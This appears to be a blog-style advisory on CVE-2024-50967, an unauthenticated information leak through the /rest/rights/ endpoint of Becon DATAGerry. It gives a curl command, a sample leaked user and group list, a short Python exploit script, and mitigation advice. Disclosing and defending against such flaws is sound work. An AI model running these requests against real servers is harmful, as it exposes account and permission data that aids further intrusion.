CVE-2024-50967 discloses a critical security issue in Becon DATAGerry, affecting versions up to 2.2.. This flaw exposes sensitive information by allowing anyone to access a REST API endpoint without needing to log in. In this long read, we’ll break down what this means, how it works, and show you exactly how attackers could exploit it—with exclusive insights and easy-to-follow code snippets.
What’s Becon DATAGerry?
DATAGerry is an open-source Configuration Management Database (CMDB) system. It helps users organize and manage complex IT infrastructure with custom data models. Configured right, it's a powerful tool. Misconfigured, especially with security flaws, it can leak data you really don’t want public.
The Vulnerability at a Glance
The vulnerable endpoint is /rest/rights/. In affected versions, this REST API route is missing proper access controls. That means anyone (not just signed-in or privileged users) can call this route remotely and get a response with information meant to be private.
Why Does It Matter?
"Access control" is a security measure that restricts who can use or see what. When it’s missing, APIs can leak internal secrets, user roles, or sensitive data without any authentication check. That’s exactly what’s happening here.
For Becon DATAGerry, this endpoint shares rights, roles, and possibly mapping information—data which, in the wrong hands, could help an attacker tailor other attacks.
Attackers need only the server’s address. No login needed. The vulnerable endpoint
/rest/rights/
Full example
http://<target-server>/rest/rights/
Step 2: Send a GET Request
A simple unauthenticated request is enough. You don’t need to include any headers, cookies, or tokens.
Curl Example
curl http://<target-server>/rest/rights/
Replace <target-server> with the actual server host name or IP.
Step 3: Examine the Response
If the server is vulnerable, you’ll get back a JSON response with sensitive information.
Here’s an example output (truncated for clarity)
{
"groups": [
{"id": 1, "name": "admins", "rights": ["read", "write", "delete"]},
{"id": 2, "name": "readonly", "rights": ["read"]}
],
"users": [
{"id": 1, "username": "admin", "groups": ["admins"]},
{"id": 2, "username": "jane", "groups": ["readonly"]}
]
}
Actual results may vary, but typically data on users, roles, and permissions will be included.
Below is a Python example to automate the info-leak
import requests
target = "http://<target-server>/rest/rights/"
response = requests.get(target)
if response.status_code == 200:
print("[+] Exploit successful!")
print(response.text)
else:
print(f"[-] Got HTTP {response.status_code}")
Replace <target-server> with your target’s address.
If you use Becon DATAGerry, you should
- Update immediately when a patch is released. (Check the official repo for updates)
Restrict access to internal dashboards and APIs using firewalls or network policies.
- Audit your logs for unexpected attempts to access /rest/rights/.
- Monitor for suspicious disclosure of user/group information.
References
- NVD CVE-2024-50967 Advisory
- DATAGerry Project on GitHub
- DATAGerry Official Website
- Full CVE JSON on MITRE
Summary
CVE-2024-50967 is an easy-to-exploit information leak in Becon DATAGerry. Anyone can remotely grab sensitive rights and user data just by accessing /rest/rights/, exposing companies running unpatched versions. Fix and restrict access ASAP, and always keep your CMDB up to date.
Timeline
Published on: 01/17/2025 15:15:12 UTC
Last modified on: 02/04/2025 16:15:37 UTC